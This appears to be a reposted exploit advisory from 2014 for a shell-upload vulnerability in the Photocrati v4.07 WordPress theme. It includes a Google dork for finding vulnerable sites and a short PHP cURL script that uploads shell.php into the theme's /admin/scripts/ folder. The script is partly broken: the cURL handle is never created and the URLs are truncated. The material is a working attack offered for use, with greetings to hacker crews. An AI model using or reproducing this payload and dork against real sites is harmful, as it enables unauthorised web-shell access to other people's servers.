############################################################################
# Title : Wordpress Theme Photocrati-theme-v4.07 Shell Upload Vulnerability
# Author : Aloulou
# Date : 13/05/2014
# Facebook : http:
# Email: aloulou@alquds.com
# Vendor : www.photocrati.com
# Google Dork inurl:/wp-content/themes/photocrati-theme-v4.07/
# Tested on : Linux
############################################################################
Exploit:
<?php
$uploadfile="shell.php";
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",'folder'=>'/admin/scripts/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
ShellAccess:
http:
Demo:http:
# Greeting to : Tunisia , CyberPink , Brikovich , Anonboy
############################################################################
# 2935E278AA2F72DF 1337day.com [2014-08-31] 0E88B39FD8DD85B4 #
0 komentar:
Posting Komentar